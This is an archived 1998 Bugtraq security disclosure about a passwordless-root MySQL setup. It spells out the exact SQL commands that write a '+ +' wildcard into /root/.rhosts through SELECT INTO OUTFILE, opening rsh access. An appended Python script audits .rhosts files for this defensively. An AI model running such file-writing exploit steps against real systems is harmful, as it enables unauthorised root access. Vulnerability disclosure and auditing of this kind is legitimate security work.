Bugtraq mailing list archives
MySQL Security
From: mike () COM PCNET RO (Sandu Mihai)
Date: Sun, 29 Mar 1998 11:16:22 +0300
When you use a certain mysql configuration it is possible to create
files on the system as root with rw-rw-rw.
Many MySQL users have included user root from localhost without password
in their config.
So. If on such a system you issue :
mysql -u root test
you not only will have access to the database but you'll be able to
create a file on the system with the root
ownership and rw-rw-rw using the SELECT .. INTO OUTFILE statement.
The file you wish to create must NOT EXIST. Otherwise mysql will give
you a "file already exists" error.
To be more precise. MySQL will create the file specified as OUTFILE
with rw-rw-rw and with the current
user as owner.
The exploit is as follows:
mysql -u root test
CREATE TABLE aa ( a CHAR(10) );
INSERT INTO aa (a) VALUES ("+ +");
SELECT * FROM aa INTO OUTFILE "/root/.rhosts";
The above exploit works for sites with rexec,rsh enabled (ssh is too
smart and won't let you in
if you have .rhosts 666, the same for authorized_keys)
Well. I've tried to be tricky by setting umask to 077 in the hope
that I can trick MySQL into
making the file 600, childish try, I know but... who knows?
If someone could fool MySQL into making the file 600 then this is
quite a serious threat..
All my best,
Sandu Mihai
p.s. The above works for Mysql Ver 6.5 Distrib 3.20.29 as reported by
mysql -V Have phun.. :)
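
An added defensive check, not part of the original post: it audits a .rhosts-style file for the two traits the message describes, a group/world-writable mode such as 666 and a "+ +" wildcard entry. The function name, finding codes and the sample file are assumptions made for this example.

```python
import os
import stat
import tempfile


def audit_rhosts(path):
    """Return (code, detail) findings for one .rhosts-style trust file."""
    findings = []
    mode = stat.S_IMODE(os.stat(path).st_mode)
    # The post's telltale: the file lands rw-rw-rw (666). The post notes that
    # ssh refuses such a file; apply the same strictness to any write bit
    # granted to group or other.
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append(("loose-mode", "mode %03o is group/world-writable" % mode))
    with open(path, errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            fields = line.split()
            # Entries are "host [user]"; "+" in either field is a wildcard,
            # so "+ +" trusts every user on every host.
            if "+" in fields[:2]:
                findings.append(("wildcard", "line %d: %s" % (lineno, line.strip())))
    return findings


def demo():
    """Audit a constructed sample that mimics the file described in the post."""
    with tempfile.TemporaryDirectory() as tmp:
        sample = os.path.join(tmp, ".rhosts")  # constructed path, not a real home
        with open(sample, "w") as fh:
            fh.write("+ +\n")
        os.chmod(sample, 0o666)
        return audit_rhosts(sample)


if __name__ == "__main__":
    for code, detail in demo():
        print(code, detail)
```
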
